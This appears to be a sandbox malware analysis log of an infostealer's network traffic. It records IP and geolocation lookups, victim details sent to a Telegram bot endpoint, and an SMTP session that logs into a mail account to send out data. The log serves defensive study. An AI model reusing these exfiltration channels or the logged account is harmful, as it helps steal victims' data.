Jan 15, 2025 15:02:25.833209991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 15, 2025 15:02:27.415630102 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:27 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 2d330866a862e3deb594845875defd40 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49758	104.21.112.1	443	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-15 14:02:11 UTC	862	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264520 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrChLsrHOeJSNUxRD%2BDhaytnS9snvB%2BlbuvgqriQ0lTGHF4cnqB%2F8FNMhRz2s0Mtqoc0fnD7C4Trlwensri53pYAV7%2Ff%2BQjvy3blJ8TuaL41Lvkvnf5LhwJUydfov8JLwtBAMy0r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902666ec7dcd727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40825&min_rtt=1977&rtt_var=23850&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476985&cwnd=234&unsent_bytes=0&cid=5fc5c28af4fdc7d0&ts=384&x=0"
2025-01-15 14:02:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49770	104.21.112.1	443	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:12 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-15 14:02:12 UTC	863	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264521 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lASTQ6yudxkpojpSgc819UfZr4JIJv8hA6ARt2%2FB1I4L%2Fw5RfJuEftGpX%2BmLCkThCKHYwvhEA%2BTQ8lYiNUZXwSJml%2FdzpOLCRfup6%2BBEG69FbBmBoaSdDMRH5DiT%2FRjOuq5ZbtFv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902666f64c7d43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1560&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1778319&cwnd=203&unsent_bytes=0&cid=5585fb53b5fb4b48&ts=166&x=0"
2025-01-15 14:02:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49782	104.21.112.1	443	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-15 14:02:14 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264523 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1iKIY%2FPk6mYmLULHllHDPkgKrdVc0IOgXk5jeMcOx2XV2eOpWWtcugJm6gQbMjLnMr8%2Fz0epJLjWqL%2FWZIzMq2ZLzhuWSZ%2BnQwvFUyOQNiFC1CELjPIvTH9RDHUtgLnCAvzNZIUE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026670059c3727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1935&rtt_var=732&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1488277&cwnd=234&unsent_bytes=0&cid=c3d48d41cf471c5f&ts=172&x=0"
2025-01-15 14:02:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49796	104.21.112.1	443	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-15 14:02:16 UTC	851	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264525 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xXraX6hxXUSGNNOFpUBLD80TDBbT8ZXpq1W0VW86Xw58Dq8hHSP6mqBxoNwdkVUgnypV8bajfluinsaoT4cHiwqvYiQWQPAgEuSVp86QRr4lsjCB%2FowFXBqHlkVJTuCFStaPjbbo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026670d6f5b727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2015&rtt_var=758&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441975&cwnd=234&unsent_bytes=0&cid=984f3c999c2d9fd9&ts=242&x=0"
2025-01-15 14:02:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49803	149.154.167.220	443	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:17 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:01:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-15 14:02:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 14:02:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-15 14:02:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49829	104.21.112.1	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-15 14:02:21 UTC	861	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264530 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imj1TBYaE1Xjc%2BmGVykdpv90O%2B8KUaBm5ZXRQwdG6FmpmVjXiMgVgx0dbwhbpZ0EkjuyVRc8dyYNqZ4cpb7Bvp2B6p7n62lUzgzuk0CV%2F%2BqEvhPbzrF1P%2B7lY8r5214SKazOJ4%2B5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026672988d5729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2576&min_rtt=2058&rtt_var=1809&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=470360&cwnd=178&unsent_bytes=0&cid=381db3575ff74b3f&ts=184&x=0"
2025-01-15 14:02:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49848	104.21.112.1	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-15 14:02:23 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264533 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ZnBoJhubZLuGGO%2BMXNSWvHr8xXWwpLBXQ9U0jAV0U3HrobLNRAnT5leIhPLA1HycqqJUlCzfCvBcCnv69geE6cw%2FsgI32agXcH78v5FYr8CYk8Jwq4FBIRUcPFE94I%2FNTVwD%2FuS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026673b8fea729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1897&rtt_var=725&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1495135&cwnd=178&unsent_bytes=0&cid=0c58007ff361fb12&ts=158&x=0"
2025-01-15 14:02:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49859	104.21.112.1	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-15 14:02:25 UTC	861	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2264534 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQRWWBQy8V96tfohtab4uYQ6%2BN4Tz%2BUdwpSjGGp783prq2yJ5JqSafn%2FQv%2F3tkw%2F7XaNYgeA6ni4aAubJDrzXC5gMcIwTR3A7ZQWUJEUcFhZXSRYpLtf08%2B6KUXwSD3uAT2KSlri"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902667470d1f727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2024&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1434889&cwnd=234&unsent_bytes=0&cid=3feb0d38c8fd3683&ts=155&x=0"
2025-01-15 14:02:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49873	149.154.167.220	443	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:02:28 UTC	334	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2015/01/2025%20/%2012:22:00%0D%0ACountry%20Name:%20%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-15 14:02:28 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 14:02:28 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-15 14:02:28 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 15, 2025 15:02:26.044300079 CET	587	49860	208.91.199.223	192.168.2.10	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 15, 2025 15:02:26.044555902 CET	49860	587	192.168.2.10	208.91.199.223	EHLO 284992
Jan 15, 2025 15:02:26.191450119 CET	587	49860	208.91.199.223	192.168.2.10	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 15, 2025 15:02:26.192650080 CET	49860	587	192.168.2.10	208.91.199.223	AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 15, 2025 15:02:26.342356920 CET	587	49860	208.91.199.223	192.168.2.10	334 UGFzc3dvcmQ6
Jan 15, 2025 15:02:26.497622013 CET	587	49860	208.91.199.223	192.168.2.10	235 2.7.0 Authentication successful
Jan 15, 2025 15:02:26.501420021 CET	49860	587	192.168.2.10	208.91.199.223	MAIL FROM:<director@igakuin.com>
Jan 15, 2025 15:02:26.650120974 CET	587	49860	208.91.199.223	192.168.2.10	250 2.1.0 Ok
Jan 15, 2025 15:02:26.650391102 CET	49860	587	192.168.2.10	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 15, 2025 15:02:26.822705030 CET	587	49860	208.91.199.223	192.168.2.10	250 2.1.5 Ok
Jan 15, 2025 15:02:26.822923899 CET	49860	587	192.168.2.10	208.91.199.223	DATA
Jan 15, 2025 15:02:26.971041918 CET	587	49860	208.91.199.223	192.168.2.10	354 End data with <CR><LF>.<CR><LF>
Jan 15, 2025 15:02:26.973339081 CET	49860	587	192.168.2.10	208.91.199.223	.
Jan 15, 2025 15:02:27.317142963 CET	587	49860	208.91.199.223	192.168.2.10	250 2.0.0 Ok: queued as B794B50036D
Jan 15, 2025 15:02:37.318792105 CET	587	49925	208.91.199.223	192.168.2.10	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 15, 2025 15:02:37.372570038 CET	49925	587	192.168.2.10	208.91.199.223	EHLO 284992
Jan 15, 2025 15:02:37.519138098 CET	587	49925	208.91.199.223	192.168.2.10	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 15, 2025 15:02:37.521856070 CET	49925	587	192.168.2.10	208.91.199.223	AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 15, 2025 15:02:37.671436071 CET	587	49925	208.91.199.223	192.168.2.10	334 UGFzc3dvcmQ6
Jan 15, 2025 15:02:37.825809002 CET	587	49925	208.91.199.223	192.168.2.10	235 2.7.0 Authentication successful
Jan 15, 2025 15:02:37.826275110 CET	49925	587	192.168.2.10	208.91.199.223	MAIL FROM:<director@igakuin.com>
Jan 15, 2025 15:02:37.974534988 CET	587	49925	208.91.199.223	192.168.2.10	250 2.1.0 Ok
